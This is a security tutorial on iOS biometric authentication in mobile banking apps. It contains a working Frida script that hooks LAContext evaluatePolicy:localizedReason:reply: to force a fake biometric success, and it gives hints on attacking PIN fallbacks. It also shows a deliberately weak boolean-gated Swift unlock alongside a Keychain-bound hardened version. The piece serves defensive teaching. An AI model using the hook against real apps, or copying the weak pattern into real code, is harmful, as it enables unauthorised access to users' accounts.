Face ID and Touch ID have become the standard way to unlock mobile banking apps. The security of a given implementation, however, depends less on the biometric hardware than on what the app does with the result: whether it merely branches on a success flag, what happens when biometrics fail and the app falls back to a PIN or passcode, and whether any secret the app needs is actually bound to the authentication.
Frida lets us inject a JavaScript runtime into a running iOS or Android process and hook native and Objective-C methods from it. That makes it possible to tamper with security checks at runtime without patching the app binary on disk (a jailbroken device running frida-server, or an app repackaged with the Frida gadget, is still required).
Many apps reduce biometric authentication to a boolean: the reply block passed to LAContext's evaluatePolicy:localizedReason:reply: receives a success flag, and the app unlocks if it is true. With Frida we can hook that method, wrap the reply block, and force the flag to true regardless of what the Secure Enclave decided. The script has to be loaded before the prompt fires, for example by spawning the app with it attached (frida -U -f <bundle-id> -l bypass.js).
// Frida script: force LAContext evaluatePolicy:localizedReason:reply: to report success.
// Only defeats apps that act on the BOOL handed to the reply block.
if (ObjC.available) {
    var hook = ObjC.classes.LAContext['- evaluatePolicy:localizedReason:reply:'];
    Interceptor.attach(hook.implementation, {
        onEnter: function (args) {
            // args[0] = self, args[1] = selector, args[2] = LAPolicy,
            // args[3] = localizedReason, args[4] = the reply block
            var reply = new ObjC.Block(args[4]);
            // Keep a callable for the app's original block before replacing it
            var callback = reply.implementation;
            // Block signature is void (^)(BOOL success, NSError *error)
            reply.implementation = function (success, error) {
                console.log("Original result: " + success + ", forcing success: true");
                return callback(true, null);
            };
        }
    });
}
Better implementations do not unlock on a flag at all: the data or key the app needs is stored in the Keychain under an access-control policy that requires biometrics (and, for keys, is generated inside the Secure Enclave), so it is only released after a genuine match. Forcing the reply block to report success achieves nothing there, because the app still never receives the secret. Bypassing such apps means looking elsewhere: the PIN or passcode fallback path, or app state machines that can be driven into the unlocked state without the Keychain read ever succeeding.
Developers should therefore use LocalAuthentication as a gate on data, not as a yes/no oracle, and never rely solely on a boolean return value for a critical security decision. Store the secret the app actually needs (a session token, a key) in the Keychain with a SecAccessControl created with kSecAccessControlBiometryCurrentSet, retrieve it through SecItemCopyMatching with an LAContext attached, and treat only a successful read as proof of authentication. Prefer LAPolicyDeviceOwnerAuthenticationWithBiometrics over LAPolicyDeviceOwnerAuthentication when a passcode fallback is not acceptable, and handle the failure cases (user cancel, lockout, changed enrollment) explicitly rather than collapsing them into true/false.
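The two patterns side by side, as an added Swift example that is not code from the original page: the boolean-gated unlock that the Frida hook defeats, beside a Keychain-bound version in which the app's session token is released only after a genuine biometric match. The service and account names, the token, and the unlockWeak/unlockHardened helpers are hypothetical.

```swift
import Foundation
import LocalAuthentication
import Security

// Added example, not code from the original page. Service/account names and the
// "session token" secret are hypothetical; adapt them to the app's own data model.

// WEAK: the app branches on the BOOL LocalAuthentication reports. Nothing the app
// needs afterwards depends on a real match, so a hook that rewrites the reply block
// (as in the Frida script above) unlocks everything.
func unlockWeak(completion: @escaping (Bool) -> Void) {
    let context = LAContext()
    context.evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics,
                           localizedReason: "Unlock your account") { success, _ in
        completion(success)   // a forged `success == true` is indistinguishable from a real one
    }
}

// HARDENED: the secret itself sits in the Keychain behind an access-control policy
// that requires the currently enrolled biometrics. The keychain only hands it back
// after a genuine match, so a forged LAContext reply yields no token.
enum BiometricKeychain {
    static let service = "com.example.bank.session"   // hypothetical
    static let account = "session-token"              // hypothetical

    static func store(token: Data) throws {
        var cfError: Unmanaged<CFError>?
        guard let access = SecAccessControlCreateWithFlags(
            kCFAllocatorDefault,
            kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
            .biometryCurrentSet,   // no passcode fallback; item is invalidated on re-enrollment
            &cfError
        ) else {
            throw cfError!.takeRetainedValue() as Error
        }
        // Replace any previous token for this service/account.
        let lookup: [String: Any] = [
            kSecClass as String: kSecClassGenericPassword,
            kSecAttrService as String: service,
            kSecAttrAccount as String: account
        ]
        SecItemDelete(lookup as CFDictionary)

        var add = lookup
        add[kSecAttrAccessControl as String] = access
        add[kSecValueData as String] = token
        let status = SecItemAdd(add as CFDictionary, nil)
        guard status == errSecSuccess else {
            throw NSError(domain: NSOSStatusErrorDomain, code: Int(status))
        }
    }

    // Blocks while the system shows the biometric prompt, so call it off the main thread.
    static func retrieveToken(reason: String) -> Result<Data, Error> {
        let context = LAContext()
        context.localizedReason = reason
        let query: [String: Any] = [
            kSecClass as String: kSecClassGenericPassword,
            kSecAttrService as String: service,
            kSecAttrAccount as String: account,
            kSecReturnData as String: true,
            kSecUseAuthenticationContext as String: context
        ]
        var item: CFTypeRef?
        let status = SecItemCopyMatching(query as CFDictionary, &item)
        guard status == errSecSuccess, let token = item as? Data else {
            // errSecUserCanceled, errSecAuthFailed, or errSecItemNotFound (also returned
            // once the item was invalidated because biometric enrollment changed).
            return .failure(NSError(domain: NSOSStatusErrorDomain, code: Int(status)))
        }
        return .success(token)
    }
}

// The app never asks "did biometrics succeed?"; it asks for the token and proceeds
// only if it actually received one. Without the token there is nothing to unlock.
func unlockHardened(completion: @escaping (Data?) -> Void) {
    DispatchQueue.global(qos: .userInitiated).async {
        let result = BiometricKeychain.retrieveToken(reason: "Unlock your account")
        DispatchQueue.main.async {
            if case .success(let token) = result {
                completion(token)
            } else {
                completion(nil)
            }
        }
    }
}
```

With the hardened form, the Frida hook on evaluatePolicy:localizedReason:reply: never fires, because the prompt is driven by SecItemCopyMatching rather than by the app; hooking the reply block gives the attacker a true flag the app never consults, and the token stays locked. The same access-control object can be attached to a Secure Enclave key (kSecAttrTokenIDSecureEnclave) when the secret should be a signing key rather than stored data.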